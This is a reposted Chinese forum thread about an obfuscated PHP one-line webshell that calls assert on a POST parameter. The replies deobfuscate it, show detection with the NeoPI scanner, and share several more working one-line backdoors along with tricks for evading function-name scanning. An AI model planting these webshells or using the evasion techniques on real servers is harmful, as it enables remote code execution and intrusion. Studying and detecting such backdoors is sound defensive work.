Heim >Backend-Entwicklung >PHP-Tutorial >一个有意思的 PHP 一句话后门,怎么破?

一个有意思的 PHP 一句话后门,怎么破?

WBOY
WBOYOriginal
2016-06-06 16:43:321275Durchsuche

看到一个有意思的php一句话:

<span class="cp"><?php </span>                  
<span class="o">@</span><span class="nv">$_</span><span class="o">=</span><span class="s2">"s"</span><span class="o">.</span><span class="s2">"s"</span><span class="o">./*-/*-*/</span><span class="s2">"e"</span><span class="o">./*-/*-*/</span><span class="s2">"r"</span><span class="p">;</span>                  
<span class="o">@</span><span class="nv">$_</span><span class="o">=/*-/*-*/</span><span class="s2">"a"</span><span class="o">./*-/*-*/</span><span class="nv">$_</span><span class="o">./*-/*-*/</span><span class="s2">"t"</span><span class="p">;</span>                  
<span class="o">@</span><span class="nv">$_</span><span class="cm">/*-/*-*/</span><span class="p">(</span><span class="err">$</span><span class="cm">/*-/*-*/</span><span class="p">{</span><span class="s2">"_P"</span><span class="o">./*-/*-*/</span><span class="s2">"OS"</span><span class="o">./*-/*-*/</span><span class="s2">"T"</span><span class="p">}</span>                  
<span class="p">[</span><span class="cm">/*-/*-*/</span><span class="mi">0</span><span class="cm">/*-/*-*/</span><span class="o">-/*-/*-*/</span><span class="mi">11</span><span class="cm">/*-/*-*/</span><span class="o">-/*-/*-*/</span><span class="mi">5</span><span class="cm">/*-/*-*/</span><span class="p">]);</span><span class="cp">?></span><span class="x"></span>
</span>

回复内容:

assert($_POST[-16]);
?> 我觉得题主应该是问的密码是多少吧,这个一句话后面注释全部去掉之后,POST数组的key其实是一个算术运算
<code class="language-text">0-11-5
</code>
这一点也谈不上新奇,也谈不上是我见过的最变态的PHP后门。

如果有服务器权限,可以扫描文件的话(作为管理员没道理不行吧?),这类后门会被一类使用统计方法(计算包括信息熵、Index of Coincidence在内的一系列统计指标)的检测工具直接干爆。给一个很简单的例子:Neohapsis/NeoPI · GitHub

使用这个Python脚本检查这个文件:
<code class="language-text">[[ Average IC for Search ]]
0.139386719155

[[ Top 10 lowest IC files ]]
  0.1394        ./test/test.php

[[ Top 10 entropic files for a given search ]]
  3.5443        ./test/test.php

[[ Top 10 longest word files ]]
      60        ./test/test.php

[[ Top 10 signature match counts ]]
       0        ./test/test.php

[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]
       0        ./test/test.php

[[ Top cumulative ranked files ]]
       5        ./test/test.php
</code>
<code class="language-text">/*-/*-*/ 注释 :)
</code>
作为一个看了一年后门的人,已经能分清一句话是公是母了,这种马确实不太奇怪,
我觉得比较有意思的一句话后门有
echo `$_GET['id']` //插在文件中比较难发现
?>
<code class="language-php"><span class="cp"><?php </span> <span class="p">(</span><span class="nv">$_</span><span class="o">=</span><span class="nv">$I</span><span class="o">.</span><span class="nv">$_GET</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span><span class="o">.</span><span class="nv">$_</span><span class="p">(</span><span class="nv">$I</span><span class="o">.</span><span class="nv">$_POST</span><span class="p">[</span><span class="mi">4</span><span class="p">])</span><span class="cp">?></span><span class="x"> 据说PKAV大牛最近写了个生成这种后门的网页</span>

<span class="cp"><?php </span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'s'</span><span class="p">](</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span><span class="c1">//躲避函数名查杀</span>
<span class="cp">?></span><span class="x"></span>

<span class="x">还有用inlude调用图片的马</span>
</span></span></code>
仅仅是字符拆分,躲避关键函数名查杀。
Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn